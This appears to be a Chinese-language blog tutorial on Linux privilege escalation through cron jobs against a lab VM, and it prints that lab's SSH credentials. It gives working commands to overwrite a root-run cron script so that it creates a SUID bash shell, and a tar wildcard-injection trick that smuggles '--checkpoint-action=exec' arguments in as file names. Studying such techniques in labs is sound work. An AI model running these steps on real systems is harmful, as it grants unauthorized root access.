linux计划任务提权

发表于 | 分类于 | 阅读数 
1
2
3
靶机地址
ssh user@192.168.28.131
password123

计划任务中的相对路径&绝对路径

制作的视频教程:https://www.bilibili.com/video/BV1wA411Y79Q/

1
2
3
4
5
6
7
8
9
10
#查看计划任务
cat /etc/crontab
cat 
#查找sh脚本
find / -name "overwrite.sh" 2>/dev/null

#查看权限
ls -al /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
Linux 权限模型通过允许给每个文件系统对象设置三种独立的权限级别来工作 — 它们为文件的所有者、文件的组以及所有其他用户。

1
2
3
4
5
6
cat /usr/local/bin/overwrite.sh

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

chmod +x /home/user/overwrite.sh
/tmp/bash -p

通配符与进度条提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
cat /usr/local/bin/compress.sh
 
对tar cxf的解释:https://whale3070.github.io/linux/2017/01/01/%E5%8E%8B%E7%BC%A9%E4%B8%8E%E8%A7%A3%E5%8E%8B%E7%BC%A9/

tar命令与checkpoint:https://www.gnu.org/software/tar/manual/html_section/tar_26.html

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
touch /home/user/--checkpoint-action=exec="sh runme.sh"

---
** (1)   -b, --blocking-factor BLOCKS **

**                  BLOCKS x 512 bytes per record**

                ** 这个用于计算一个记录块是大小.是512的倍数**

**  (2)--checkpoint
           display progress messages every NUMBERth record (default 10)**

    **这个用进度条显示信息,检测数据点的位置,是record为单位**

 ** (3)--checkpoint-action=ACTION
           execute ACTION on each checkpoint**

**   这个是每个checkpoint,可以自定义输出你想的信息**

计划任务——sh文件覆盖

1
2
3
4
5
6
cat /etc/crontab
ls -l /usr/local/bin/overwrite.sh

#root权限运行
chmod o=rw /usr/local/bin/overwrite.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

参考资料

https://github.com/sagishahar-zz/lpeworkshop 利用通配符进行Linux本地提权